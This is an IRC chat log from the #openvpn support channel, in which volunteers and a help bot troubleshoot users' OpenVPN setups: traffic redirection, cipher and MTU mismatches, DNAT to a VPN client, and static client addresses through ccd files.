http://pastebin.com/7s5J8rr8 18:54 <@krzee> marksaitis, you said the server is some sort of virtual machine? 19:00 < marksaitis> the server is in datacentre, directly connected to the internet ip. my openvpn client is a vm at home on my windows host :) 19:00 <@krzee> oh ok, so lets re-diagnose the issue 19:00 <@krzee> !goal 19:00 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 19:01 <@krzee> sharing server lan or redirecting internet over vpn? 19:02 < marksaitis> tap is configured, I can ping openvpn host 10.8.0.1 from my client which is vm bridged with tap adapter on vm-host which is connected to openvpn server. I can not ping google.com from vm client but can ping 10.8.0.1 19:02 <@krzee> !configs 19:02 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 19:06 < marksaitis> krzee, http://paste.ubuntu.com/5580923/ http://paste.ubuntu.com/5580926/ 19:07 <@krzee> read this again 19:07 <@krzee> !configs 19:07 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 19:07 <@krzee> read the whole thing, it says more than just "paste your configs with 1000 lines of comments" 19:07 < marksaitis> ok :)))))) 19:09 < marksaitis> http://paste.ubuntu.com/5580935/ 19:10 < marksaitis> http://paste.ubuntu.com/5580937/ 19:18 <@krzee> you arent telling openvpn to redirect your internet over the vpn 19:18 <@krzee> therefor openvpn is correct not to 19:19 <@krzee> !redirect 19:19 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 19:19 <@vpnHelper> http://ircpimps.org/redirect.png 19:19 <@krzee> see the troubleshooting flowchart 19:19 <@krzee> last link, #4 19:20 <+rob0> Nombre quatro, se~or. 19:20 <+rob0> por favor! 19:21 <@krzee> name four, ??-?? 19:21 <@krzee> please! 19:21 <@krzee> thats the translation for that one, lol 19:21 <@krzee> ohh señor :D 19:22 <@krzee> s/Nombre/numero/ 19:22 <@krzee> :D 19:23 <+rob0> oh oops 19:23 <+rob0> I plead the fifth. 19:24 <@krzee> lol lol 19:24 <@krzee> I PLEAD THE FIF 19:24 <@krzee> 1 2 3 4 FIF 19:24 <+rob0> I plead the 750ml bottle. 19:24 <+pekster> Plead the forth: it's more fun. http://xkcd.com/496/ 19:24 <@vpnHelper> Title: xkcd: Secretary: Part 3 (at xkcd.com) 19:24 <+pekster> Oh, that was the third. I suppose I should read comics before I quote from them, 'eh? 19:25 <@krzee> http://www.ebaumsworld.com/video/watch/81460739/ 19:25 <@vpnHelper> Title: DAVE CHAPPELLE - I PLEAD THE FIF - Video (at www.ebaumsworld.com) 19:27 <+rob0> Oops. I even got the bottle wrong. It's 1.5 liter! 19:27 * rob0 crawls under Iraq 19:30 <@krzee> lol nice comic 19:30 <@krzee> the auto-troll shuffle! 19:32 -!- Zhvtar is now known as zhvtar 19:36 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 19:42 < marksaitis> krzee, I thought it might be that... but I specified in vm client static gw, also I dont want my vm host to have all internet redirected thru openvpn tap adapter 19:43 <@krzee> marksaitis, whats your goal 19:43 <@krzee> what DO you want? 19:44 <@krzee> your configs simply make a connection between client and server, and that is working 19:44 <@krzee> before i can help you go further, i need to know what you want 19:46 <@krzee> rob0, http://xkcd.com/1168/ 19:46 <@vpnHelper> Title: xkcd: tar (at xkcd.com) 19:46 * rob0 wants more booze 19:46 <+rob0> hehe 20:05 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 20:06 -!- MFSOT [~garret@c-24-34-166-26.hsd1.ma.comcast.net] has joined #openvpn 20:07 < MFSOT> having trouble connecting my win7 client to my pfsense openvpn server, anyone with some experience in this realm hanging out tonight? 20:10 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 255 seconds] 20:11 -!- sh_t [~sht@176.222.238.158] has joined #openvpn 20:12 -!- pinion [~pinion@unaffiliated/pinion] has quit [Read error: Connection reset by peer] 20:15 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has quit [] 20:16 -!- pinion [~pinion@unaffiliated/pinion] has joined #openvpn 20:21 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 248 seconds] 20:27 -!- bluethundr [~dunphy@ool-457cd1ed.dyn.optonline.net] has joined #openvpn 20:28 -!- bluethundr [~dunphy@ool-457cd1ed.dyn.optonline.net] has quit [Read error: Connection reset by peer] 20:31 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 20:34 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 20:35 -!- latenite [~latenite@138.77.120.247] has joined #openvpn 20:35 <+pekster> !configs 20:35 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 20:35 <+pekster> !logs 20:35 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 20:35 <+pekster> Start there 20:36 <+pekster> verb 3 is fine if that's what you're using now (I'll let you know if I need higher after seeing them) 20:38 < latenite> pekster, sorry I already edited and restarted... 20:38 < latenite> so thats the server https://gist.github.com/anonymous/5074229 20:38 <@vpnHelper> Title: gist:5074229 (at gist.github.com) 20:38 <+pekster> np, 5 just gives more info (more isn't a problem, although >5 and you end up with lots of worthless debugging info, unless you're a developer) 20:39 <+pekster> Start with the config 20:39 <+pekster> status doesn't help (that shows you have "no clients" connected and isn't useful) 20:39 <+pekster> See the bot output above for a grep syntax to strip comments too 20:40 < latenite> and thats the client log: https://gist.github.com/anonymous/5074235 20:40 <@vpnHelper> Title: gist:5074235 (at gist.github.com) 20:41 < latenite> pekster, I wonder why it sais "inactive" when I restart 20:41 < dli_> can I connect to openvpn 2.2 server using openvpn version 2.3 client? 20:41 <+pekster> dli_: Yup, everything except ipv6 should work fine like that 20:42 < latenite> pekster, this is the server config: 20:42 < latenite> https://gist.github.com/anonymous/5074237 20:42 <+pekster> latenite: looks like you're not getting any options or IP pushed 20:42 <@vpnHelper> Title: gist:5074237 (at gist.github.com) 20:42 < dli_> pekster, then, it's really weird, each time I upgrade to 2.3 client. the client gets IP, but nothing else works, I can not ping 20:42 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 20:43 <+pekster> best to have run that through the grep command the bot gave you above latenite. I can do it on my end, but next time I don't need 100's of lines of comments/blanks 20:43 < dli_> Mar 2 21:43:00 compaq ovpn-openvpn[4768]: gateway/172.16.0.6:44037 FRAG_IN error flags=0xfa2a187b: FRAG_TEST not implemented 20:44 < latenite> pekster, please excuse https://gist.github.com/anonymous/5074246 20:44 <@vpnHelper> Title: gist:5074246 (at gist.github.com) 20:45 <+pekster> Thanks, much easier to read (and less of a hassle to save/sed/re-load that on my end) 20:46 <+pekster> latenite: Can you paste the client config the same way? It's not pulling the IP/route details fromo the server it should 20:46 <+pekster> You're probably missing the client or pull directive to do that 20:46 <+pekster> dli_: You get that in the client log when pinging the server's VPN IP? 20:47 -!- MFSOT [~garret@c-24-34-166-26.hsd1.ma.comcast.net] has quit [Ping timeout: 248 seconds] 20:48 < latenite> pekster, there we go. :D https://gist.github.com/anonymous/5074256 20:48 <@vpnHelper> Title: gist:5074256 (at gist.github.com) 20:48 -!- l1t [~l1t@cpe-70-112-112-239.austin.res.rr.com] has joined #openvpn 20:49 < dli_> pekster, http://pastebin.com/UPz6zj99 20:50 < l1t> hi i'm getting the following error when just testing connecting to opnevpn from my home network to my home router vpn: https://ezcrypt.it/Nd6n#W1xQqw5FAnChgo4latDoxgnB Where do I actually remove --remote or add --float to?? 20:50 <@vpnHelper> Title: EZCrypt - Paste (at ezcrypt.it) 20:50 <+pekster> latenite: Okay, looks like the client isn't successfully getting connected. that log file from the client doesn't contain the expected line 'Initilization sequence completed'. It is getting an initial packet back (line 230 in the client log paste you linked) but not a successful connection 20:51 <+pekster> dli_: Looks like at the very least you have mis-matched MTU settings between your peers 20:52 < latenite> pekster, hmm ok. I have to admit I dont know how to get this straiht. How would I get a Initilization sequence completed then? 20:55 <+pekster> l1t: The config file on the system emitting that message, or the command-line you're calling it with 20:56 < dli_> pekster, I have " tun-mtu 1450" and "fragment 1350" at both server and client conf, but the client log shows,local='tun-mtu 1500', 20:56 <+pekster> latenite: Did you copy that log file pre-maturely before it completed? If not, the TLS handshake and openvpn tunnel negotiation never completed and you're not actually connected, hence the client has no IP 20:56 < latenite> pekster, I dont think the network setting on the tun device are right https://gist.github.com/anonymous/5074281 20:56 <@vpnHelper> Title: gist:5074281 (at gist.github.com) 20:58 <+pekster> dli_: Any chance that's getting overritten with some frontend (like networkmanager or an initscript) adding --tun-mtu as a command line option? The last used option takes priority 20:58 <+pekster> latenite: that's fine for a PtP setup. 'ip route show' should list the 10.8.0.0/24 route 20:59 < dli_> pekster, nobody 9867 0.0 0.0 21044 3228 ? Ss 21:53 0:00 /usr/sbin/openvpn --cd /etc/openvpn --config /etc/openvpn/tw3.conf --daemon openvpn@tw3 20:59 < latenite> I realy might have pasted the log file to early. Now there are anotehr 3 line https://gist.github.com/gists 20:59 <@vpnHelper> Title: Gists (at gist.github.com) 20:59 < dli_> pekster, looks like there's no command line option for openvpn at client side. Another hint is that, if I downgrade 2.3 client to 2.2, without conf change, it works again 21:00 < latenite> pekster, that the routing table of the client https://gist.github.com/anonymous/5074292 21:00 <@vpnHelper> Title: gist:5074292 (at gist.github.com) 21:00 <+pekster> dli_: "no command line option for openvpn at client side" <-- I don't get that 21:01 < dli_> pekster, I pasted the whole command line for openvpn at the client side 21:01 < dli_> pekster, let me pastebin the client conf file 21:01 <+pekster> Sure 21:02 <+pekster> latenite: The routing table looks fine. You didn't copy the URL on the extra clcient log output link though 21:03 < dli_> pekster, https://gist.github.com/5074300 21:03 <@vpnHelper> Title: /tmp/tw3.conf (at gist.github.com) 21:03 < latenite> pekster, sorry. I don't know what you meen. What am I missing? 21:04 < latenite> pekster, ohh I see... 21:04 < latenite> hold on.. :D 21:04 < latenite> pekster, https://gist.github.com/anonymous/5074289 21:04 <@vpnHelper> Title: gist:5074289 (at gist.github.com) 21:05 < latenite> pekster, sometimes github is kinda slow.. :D 21:07 <+pekster> dli_: Ah, okay, I don't think you intend to be using an --fragment value lower than the --tun-mtu value. That's probably why you get that FRAG_TEST message, becuase openvpn is trying to fragment packets smaller than your link size is. Do you need the mtu stuff at all? Normally you only need that when either PMTU is broken, or you have a pppoe link or something 21:07 < latenite> pekster, whats with line 447 to 461 ? https://gist.github.com/anonymous/5074289 21:07 <@vpnHelper> Title: gist:5074289 (at gist.github.com) 21:08 < latenite> pekster, that looks kind of bad to me.. Is it? 21:08 <+pekster> This is a bigger issue for you: WARNING: 'cipher' is used inconsistently, local='cipher AES-128-CBC', remote='cipher BF-CBC' 21:09 <+pekster> You need to match options like encryption on both sides 21:09 < dli_> pekster, I found I had to set those values, without fragment, copying files larger than 1KB failed. how do I fix this issue? 21:09 <+pekster> I missed that before latenite. Your client & server configs don't match 21:09 < latenite> pekster, in what way? 21:10 < latenite> pekster, where would the mismatch be? 21:10 < dli_> pekster, my server is at home on PPPOE (adsl) 21:10 <+pekster> latenite: remove line 14 as shown here: https://gist.github.com/anonymous/5074256 21:10 <@vpnHelper> Title: gist:5074256 (at gist.github.com) 21:11 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn 21:11 -!- aaaar0n is now known as ar0nic 21:11 <+pekster> dli_: Ah, ideally use the --mtu-test option on the client (that'll take a few minutes to complete) which connects to your server and discovers the largest unfragmented packet it can send successfully 21:11 < dli_> pekster, thanks 21:12 <+pekster> dli_: Then take that value and apply it to the --fragment value, along with the --mssfix option 21:12 <+pekster> You should leave the --tun-mtu alone in most cases 21:12 < latenite> pekster, wow, cool. I can ping the server. 21:12 < latenite> https://gist.github.com/anonymous/5074316 21:12 <@vpnHelper> Title: gist:5074316 (at gist.github.com) 21:12 < dli_> pekster, it's clear, thanks 21:12 <+pekster> --mssfix in the manpage has some useful troubleshooting tips too dli_ :) 21:13 < latenite> pekster, thats good, right :D ?!! 21:13 <+pekster> Yup, your VPN is working since you can ping your remote peer 21:13 <+pekster> (log file was again cut off early, but that's okay.) 21:14 < latenite> pekster, now how would I test that whole thing? I meen the main reason why I did et it up was because my email clients ports are filtered. 21:14 <+pekster> You can drop the verb level down to 4 or lower (3 is thte default) since otherwise your log gets RWrw printed for every packet 21:14 <+pekster> latenite: What's the goal here? 21:15 <+pekster> !goal 21:15 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 21:15 < latenite> pekster, I just wonder about the workings. Because now I have the wifi....AND the tun interface. How does my laptops software (email client) know which device/internet connection to use? 21:16 <+pekster> routing tables. Your default route is still used; the VPN currently only is used for 10.8.0.0/24 (the VPN network itself) 21:16 < latenite> the goal is to be able to use all ports on my client while beeing on this campus wifi which only allows certain ports (80, 443, 21 ...) 21:16 <+pekster> "use all ports on my client" ? 21:17 <+pekster> For outbound access? 21:17 < latenite> e.g. I can ssh TO the outside world. But I can not copy a file from a remote server to my laptop. 21:18 < latenite> ssh inbound is blocked by the wifi-capus setup 21:18 <+pekster> That's more complicated since your client's VPN IP is an rfc1918 IP, so it's private and not globally routable 21:18 <+pekster> You either need to give the client a public IP (which requires you to have routed a block on your VPN server that you can allocate to clients) or use NAT on the VPN server to expose the ports you want 21:19 -!- dli_ [~dli@dsl-69-171-139-151.acanac.net] has quit [Ping timeout: 248 seconds] 21:20 < latenite> pekster, I can not give my client a public IP. I only have this one public IP thats is bounf to my Vserver that I have rented. 21:21 < latenite> pekster, each public IP would cost a dollar or so and I doub they hand out as many as I want 21:21 < latenite> pekster, How would I do the NAT thing on the server? 21:23 -!- pulz_ [geir@winning.no] has joined #openvpn 21:23 -!- matsh_ [divine@nanogene.org] has joined #openvpn 21:24 -!- rob0_ [rob0@harrier.slackbuilds.org] has joined #openvpn 21:24 -!- rob0_ [rob0@harrier.slackbuilds.org] has quit [Changing host] 21:24 -!- rob0_ [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 21:25 -!- kisom_ [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 21:26 <+pekster> latenite: So you can DNAT packets as they reach your server's public IP and send them to your VPN client's internal IP, although you need to be careful not to do this for ssh for instance or you'll loose remote access to the host itself 21:26 <+pekster> (or run ssh on differnet ports for the VPN server vs the client) 21:27 <+pekster> Make sure to exclude ports like that you require proper access to the host, and then you could redirect anything else to the client. You'd want to firewall the client properly in any event, since it will be exposed to all the usual nastyness on the public Internet 21:27 -!- simcop2387_ [~simcop238@p3m/member/simcop2387] has joined #openvpn 21:27 -!- xbanux [~xbanux@triband-mum-59.182.131.207.mtnl.net.in] has joined #openvpn 21:27 -!- dli_ [~dli@69.172.86.211] has joined #openvpn 21:28 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Disconnected by services] 21:28 -!- rob0_ is now known as rob0 21:29 < latenite> pekster, So what you're saing is: I should run my sshd on the vpn-server on a port like 2222 ? 21:29 < latenite> pekster, did I get that right? 21:29 <+pekster> Not really, that depends greatly on how you want to DNAT things 21:29 <+pekster> If you want to pass specific ports through, then do that instead 21:30 <+pekster> Otherwise, here's an example that re-directs "everything but tcp/22" to the VPn client, assuming it's on 10.8.0.6: http://paste.kde.org/686006/ 21:30 -!- Netsplit *.net <-> *.split quits: @plaisthos, @vpnHelper, corretico, simcop2387, pulz, Cybertinus, matsh, amir, kisom, clu5ter 21:30 -!- matsh_ is now known as matsh 21:30 -!- simcop2387_ is now known as simcop2387 21:30 <+pekster> It's very (very!) critical you understand how that works before you implement it, and requires the traffic to be let through on the relevant filter chains as well 21:31 <+pekster> And, there goes our bot 21:31 < latenite> pekster, I am very sorry. But this is all very new to me. 21:32 < latenite> so what our paste does, is set up iptable/firewall rules. right? 21:32 <+pekster> latenite: So, basically that snippit (that's all on the nat table) takes any packets coming in bound for the public IP of the server, and sends them to the "vpn_nat" chain. It returns (ie: ignores) anything coming in for tcp/22 (which I'm assuming is for ssh to the host itself.) Anything else that's coming in as a new connection gets re-written to go to the VPN client instead 21:33 < latenite> pekster, I d have to read the manual about the flaf -j -d 21:33 <+pekster> Line 10 takes incoming packets bound for the VPN server's public IP and sends them to the vpn_nat chain 21:33 <+pekster> Line 11 ignores (ie: does not NAT) ones bound for tcp/22 21:34 <+pekster> Line 12 takes "anything else" on that vpn_nat chain and sends them to the VPN client on that IP 21:35 < latenite> pekster, but by that only the client with 10.8.0.6 would be able to use all that? 21:35 <+pekster> Right 21:35 <+pekster> You only have 1 public IP 21:35 <+pekster> Welcome to the ugly world of NAT 21:35 <+pekster> Your 10.8.0.0/24 "doesn't exist" according to the rest of the internet. You and everyone else using the example VPN config file use that same network 21:36 < latenite> No way I could ever use more than one client to do what I want with this vpn-server? 21:36 -!- Netsplit over, joins: corretico 21:36 < latenite> I so see the problem! 21:36 <+pekster> Sure, you can connect as many as you'd like 21:36 <+pekster> But how do you plan to get "outside" data to them? 21:37 < latenite> how would my vpn server know where to send the packets to...if they are ment to be send to the same IP/port 21:37 -!- Netsplit over, joins: amir 21:37 <+pekster> Right. It can't. 21:37 < latenite> I did get that right?! 21:37 < latenite> ok..I feel like I understood some of it. 21:38 < latenite> Ok so what I would need is a range of real IPs?! 21:38 < latenite> no way around that?! 21:38 <+pekster> That, or use more targeted NAT and send specific ports to specific clients. You presumably also want to expand the --server directive on the openvpn server config file and break that out (see the manpage for how expansion works) to reduce the ifconfig-ppol 21:38 <+pekster> You need static IPs if you expect the same client to get the same IP, so that would mean using ccd files and ifconfig-push rules in them 21:38 <+pekster> !ccd 21:39 <+pekster> Ugh, and the bot was lost in the netsplit 21:39 <+pekster> The bot would have told you: 21:39 <+pekster> #1: entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name 21:39 <+pekster> #2: the ccd file is parsed each time the client connects. 21:40 < latenite> pekster, that's basicly for my cleint to always get the same IP?! 21:40 * rob0 appoints pekster as #openvpn's Junior Assistant Bot 21:40 <+pekster> rob0: If I didn't have the factoids link in my browser URL history, I was not planning to grep for the factoids link :P 21:41 < rob0> Bot Pro Tem 21:41 <+pekster> latenite: Right. And ifconfig-push gets more logical to manage if you use the 'topology subnet' in your server, otherwise you need to push IPs in the middle of a /30 within the VPN network 21:42 <+pekster> (and that's just ugly) 21:43 < latenite> pekster, *cry* I did not get that a bit. sorry 21:43 < latenite> So for me to get started. 21:43 <+pekster> Add 'topology subnet' to the server is all you need to take away from that 21:43 < latenite> ...I dont have any rules in my firewal for now... 21:43 <+pekster> You don't need (or want) the default net30 behaviour (it's complicated, and only useful if you have really old 2.0.9 clients that are over 6 years old) 21:45 < latenite> pekster, I wouldn't knwo what the net30 thing is. sorry 21:45 < latenite> ok I added topology subnet to my server.conf 21:45 <+pekster> In that case you can take my example rule snippit and load it via iptables-restore (though you need to fix my typo: I added an extra space on line 5 after the colon that desn't belong) 21:46 <+pekster> It's somewhat unwise to run a server with no firewall at all, but perhaps you're not running anything besdies ssh on it anyway. It's still bad practice for anything on the public Internet 21:47 <+pekster> Just be warned that ruleset does exactly what I described in that anything not caught by the return rules on that vpn_nat chain get sent to the client. It will effectively make communicating with the server impossible for anything not there 21:47 <+pekster> That includes inbound pings too, for better or worse 21:48 <+pekster> Overall I think it's a somewhat silly thing to do, but you're free to play with that 21:48 <+pekster> Seems an awful lot of trouble to go through just to accept inbound connections to your system 21:50 < latenite> pekster, I could still use ssh to log in to the von server? right? 21:50 <+pekster> Provided it's listening on port 22, yes 21:51 < latenite> pekster, actually I would like that. by that its like a "dead thing" but nicely pushes evreything to my client 21:51 <+pekster> rob0: Can you please make IPv6 come faster? kthx. 21:52 < rob0> um, I'm an email admin, I am afraid of ipv6 :( 21:52 < latenite> pekster, to I need to do anything else to the server config to make sure I keep getting the same ip for my client? For now I only added topology subnet and restartd 21:52 <+pekster> latenite: Right. I'd generally recommend you accept pings to the server too, since that's a useful debugging tool. Add this between lines 11 & 12: -A vpn_nat -p icmp --icmp-type ping 21:52 < rob0> (wide open opportuntites for spammers, DNSBLs will no longer be feasible) 21:53 <+pekster> latenite: Yes, do what I said above. Expand the --server directive as described in the manpage for the expansion for tun. Then reduce your ifconfig-pool range to something sane line 10.8.0.100 10.8.0.199. Finally add a ccd file as I pasted info for above, named with your client cert CN, and put in that file: ifconfig-push 10.8.0.6 255.255.255.0 21:54 <+pekster> rob0: Well, if mail servers checked to make sure a sending MTA was also listed in a forward zone, that might help 21:55 <+pekster> Google and other places have IPv6-enabled mail gateways, and they seem to be doing okay 21:55 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 21:55 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 21:55 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 21:55 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 21:55 -!- ServerMode/#openvpn [+oo plaisthos vpnHelper] by leguin.freenode.net 21:55 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Max SendQ exceeded] 21:55 <+pekster> vpnHelper: slacker. 21:55 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 21:56 < rob0> The only reasonable way I see is to use a default-deny policy and whitelists. Spam hasn't yet taken hold in ipv6 because spammers focus their efforts where more junk can get delivered. A lot of sites are hesitating to publish ipv6 MX. 21:56 < rob0> when more users are in v6, spam will be there too 21:58 -!- xbanux [~xbanux@triband-mum-59.182.131.207.mtnl.net.in] has quit [Ping timeout: 245 seconds] 22:00 < latenite> pekster, nice. I will try to do all that now. For started I will feed myself the man page ... :D top to bottem 22:01 < latenite> pekster, one thing: How can I change the default route on my client? For now its still using the wifi 22:01 <+pekster> You want to redirect all Internet-bound traffic to use the VPN 22:01 <+pekster> !redirect 22:01 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 22:01 <@vpnHelper> http://ircpimps.org/redirect.png 22:02 <+pekster> (actually, you need to do that anyway for the DNAT-everything ruleset I showed above too, otherwise return routing gets all messed up) 22:04 <+pekster> rob0: Yea, I wonder if google has a write-up somewhere on what they do, or if they just filter everything and call that good enough for v6 for now 22:04 <+pekster> filter := spam filtering 22:06 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Read error: Operation timed out] 22:06 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 22:07 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Operation timed out] 22:07 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 22:07 -!- xbanux [~xbanux@triband-mum-59.182.131.207.mtnl.net.in] has joined #openvpn 22:07 -!- pinion [~pinion@unaffiliated/pinion] has quit [Read error: Operation timed out] 22:08 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Read error: Operation timed out] 22:08 -!- pinion [~pinion@unaffiliated/pinion] has joined #openvpn 22:08 < latenite> pekster, what does "(see !def1)" meen? How can I see info on that? 22:08 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 22:09 < rob0> !def1 22:09 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 22:10 < latenite> !ipforward 22:10 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 22:10 < latenite> ahh :D cool th 22:10 < latenite> x 22:10 < rob0> pekster: Content filtering is about the only thing they can do right now, other than maintaining private ipv6 blacklists. 22:10 < latenite> !nat 22:10 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 22:11 < rob0> but whereas ipv4 spam is ~90% of the SMTP traffic now, ipv6 spam is probably not nearly so high yet. 22:13 -!- Teck7 [~teck7@bas1-montreal54-1167955052.dsl.bell.ca] has joined #openvpn 22:16 < latenite> pekster, let me thank you. You realy got me a good start on things here. I will try to figure out the rest after lunch. 22:16 -!- rfxn [~teck7@bas1-montreal54-1168086246.dsl.bell.ca] has quit [Ping timeout: 248 seconds] 22:17 < latenite> I realy appreciate you help. I would have never found all that out 22:19 < latenite> pekster, can you tell me how to set the gateway in the route right? Right now its 0.0.0.0 and not the primary route: https://gist.github.com/anonymous/5074482 22:19 <@vpnHelper> Title: gist:5074482 (at gist.github.com) 22:21 <+pekster> latenite: Looks like you need to add the 'route-gateway' directive (or push it from the server if that's from the client's view) 22:21 <+pekster> That should match the VPN server's VPN IP. As before, see the --server expansion in the manpage 22:21 <+pekster> (it's included there) 22:22 < latenite> pekster, it is from the clients view. This is the server: https://gist.github.com/anonymous/5074493 22:22 <@vpnHelper> Title: gist:5074493 (at gist.github.com) 22:22 <+pekster> Oh, right, because it's on-link 22:23 <+pekster> 'ip route' is the preffered way to show routes 22:23 <+pekster> ifconfig, route, and netstat are all old tools for that purpose 22:26 < latenite> pekster, ok I will. 22:27 < latenite> pekster, the --server expansion only has two paramters: network and netmask 22:27 < latenite> https://gist.github.com/anonymous/5074497 22:28 <+pekster> The entire "for example" section is the expension 22:28 <+pekster> "... *expands* as follows:" (emphasis mine) 22:28 <+pekster> ifconfig, ifconfig-pool, push "route-gateway ..." are all part of the implicit expansion. You need to fix your pool range if you want staticly assigned IPs 22:29 <+pekster> ie: don't let --server do it for you. It's a helper-directive that only works if you want exactly what it "helps" do for you 22:29 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 22:29 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 22:29 -!- mode/#openvpn [+o vpnHelper] by ChanServ 22:32 < latenite> pekster, setting the pool range is part of the ccp file? 22:38 <+pekster> ccd is for client-specific options, so no. ifconfig-pool goes in the main server config 22:38 <+pekster> ifconfig-push gets put in a ccd file (or client-connect script.) 22:38 <+pekster> !ccd 22:38 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 22:57 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Quit: emmanuelux] 23:03 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 23:03 -!- xbanux [~xbanux@triband-mum-59.182.131.207.mtnl.net.in] has quit [] 23:03 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 23:04 -!- xbanux [~xbanux@triband-mum-59.182.131.207.mtnl.net.in] has joined #openvpn 23:15 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 23:16 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 23:21 -!- a [~d@64.111.123.163] has joined #openvpn 23:21 -!- a is now known as Guest94901 23:22 -!- takatuka [~takatuka2@85.105.115.238] has joined #openvpn 23:23 -!- rooth_ [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 23:26 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 23:27 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 23:27 -!- Winston_Smith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 23:27 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 23:27 -!- Winston_Smith is now known as WinstonSmith 23:27 -!- rooth 